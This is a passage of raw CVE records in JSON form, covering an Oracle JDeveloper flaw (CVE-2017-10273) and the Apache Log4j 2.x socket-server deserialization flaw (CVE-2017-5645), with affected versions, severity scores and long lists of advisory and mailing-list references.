Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper.", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2018-01-23T10:57:01", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { name: "102569", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/102569", }, { name: "43848", tags: [ "exploit", "x_refsource_EXPLOIT-DB", ], url: "https://www.exploit-db.com/exploits/43848/", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1040207", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2017-10273", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "JDeveloper", version: { version_data: [ { version_affected: "=", version_value: "11.1.1.7.0", }, { version_affected: "=", version_value: "11.1.1.7.1", }, { version_affected: "=", version_value: "11.1.1.9.0", }, { version_affected: "=", version_value: "11.1.2.4.0", }, { version_affected: "=", version_value: "12.1.3.0.0", }, { version_affected: "=", version_value: "12.2.1.2.0", }, ], }, }, ], }, vendor_name: "Oracle Corporation", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. 
Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. 
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper.", }, ], }, ], }, references: { reference_data: [ { name: "102569", refsource: "BID", url: "http://www.securityfocus.com/bid/102569", }, { name: "43848", refsource: "EXPLOIT-DB", url: "https://www.exploit-db.com/exploits/43848/", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1040207", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2017-10273", datePublished: "2018-01-18T02:00:00", dateReserved: "2017-06-21T00:00:00", dateUpdated: "2024-10-04T16:38:51.515Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2017-5645
Vulnerability from cvelistv5
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Log4j | Version: All versions between 2.0-alpha1 and 2.8.1 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T15:11:47.391Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "RHSA-2017:2888", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { name: "RHSA-2017:2809", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { name: "97702", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/97702", }, { name: "1041294", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1041294", }, { name: "RHSA-2017:2810", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { name: "RHSA-2017:1801", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { name: "RHSA-2017:2889", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { name: "RHSA-2017:2635", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { name: "RHSA-2017:2638", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { name: "RHSA-2017:1417", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { name: "RHSA-2017:2423", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { name: "RHSA-2017:2808", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { name: "1040200", tags: [ 
"vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1040200", }, { name: "RHSA-2017:2636", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { name: "RHSA-2017:3399", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { name: "RHSA-2017:2637", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { name: "RHSA-2017:3244", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { name: "RHSA-2017:3400", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { name: "RHSA-2017:2633", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { name: "RHSA-2017:2811", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { name: "RHSA-2017:1802", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { name: "RHSA-2019:1545", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { name: "[logging-dev] 20191215 Re: Is there any chance that there will be a security fix for log4j-v1.2.17?", tags: [ "mailing-list", "x_refsource_MLIST", 
"x_transferred", ], url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3Cdev.logging.apache.org%3E", }, { name: "[logging-dev] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E", }, { name: "[oss-security] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { name: "[announce] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3Cannounce.apache.org%3E", }, { name: "[logging-dev] 20191219 Re: [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3Cdev.logging.apache.org%3E", }, { name: "[activemq-issues] 20191226 [jira] [Created] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Created] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: 
"https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191230 [jira] [Created] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20191230 [jira] [Created] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20200106 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200107 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200108 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3Cdev.tika.apache.org%3E", }, { name: 
"[tika-dev] 20200110 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 Re: [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Closed] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Resolved] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200114 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200115 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 
5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Resolved] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200127 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200208 [jira] [Commented] (AMQ-7370) log4j 
1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Resolved] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3Cissues.activemq.apache.org%3E", }, { name: "[logging-commits] 20200425 svn commit: r1059809 - /websites/production/logging/content/log4j/2.13.2/security.html", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3Ccommits.logging.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: 
"http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { name: "[bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E", }, { name: "[activemq-issues] 20200730 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable 
to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3Cissues.activemq.apache.org%3E", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "[doris-commits] 20210402 [GitHub] [incubator-doris] zh0122 opened a new pull request #5594: [FE][Bug]Update log4j-web to fix a security issue", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3Ccommits.doris.apache.org%3E", }, { name: "[beam-issues] 20210528 [jira] [Created] (BEAM-12422) Vendored gRPC 1.36.0 is using a log4j version with security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3Cissues.beam.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik 
opened a new pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] edited a comment on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] suztomo commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3Cgithub.beam.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j", vendor: "Apache Software Foundation", versions: [ { status: "affected", version: "All versions between 2.0-alpha1 and 2.8.1", }, ], }, ], datePublic: "2017-04-02T00:00:00", descriptions: [ { lang: "en", value: "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or 
UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", }, ], problemTypes: [ { descriptions: [ { description: "Remote Code Execution.", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2022-02-07T14:40:00", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { name: "RHSA-2017:2888", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { name: "RHSA-2017:2809", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { name: "97702", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/97702", }, { name: "1041294", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1041294", }, { name: "RHSA-2017:2810", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { name: "RHSA-2017:1801", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { name: "RHSA-2017:2889", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { name: "RHSA-2017:2635", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { name: "RHSA-2017:2638", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { name: "RHSA-2017:1417", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { name: "RHSA-2017:2423", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { name: "RHSA-2017:2808", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: 
"https://access.redhat.com/errata/RHSA-2017:2808", }, { name: "1040200", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1040200", }, { name: "RHSA-2017:2636", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { name: "RHSA-2017:3399", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { name: "RHSA-2017:2637", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { name: "RHSA-2017:3244", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { name: "RHSA-2017:3400", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { name: "RHSA-2017:2633", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { name: "RHSA-2017:2811", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { name: "RHSA-2017:1802", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { name: "RHSA-2019:1545", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { name: "[logging-dev] 20191215 Re: Is there any chance that there will be a security fix for log4j-v1.2.17?", tags: [ "mailing-list", "x_refsource_MLIST", ], url: 
"https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3Cdev.logging.apache.org%3E", }, { name: "[logging-dev] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E", }, { name: "[oss-security] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { name: "[announce] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3Cannounce.apache.org%3E", }, { name: "[logging-dev] 20191219 Re: [CVE-2019-17571] Apache 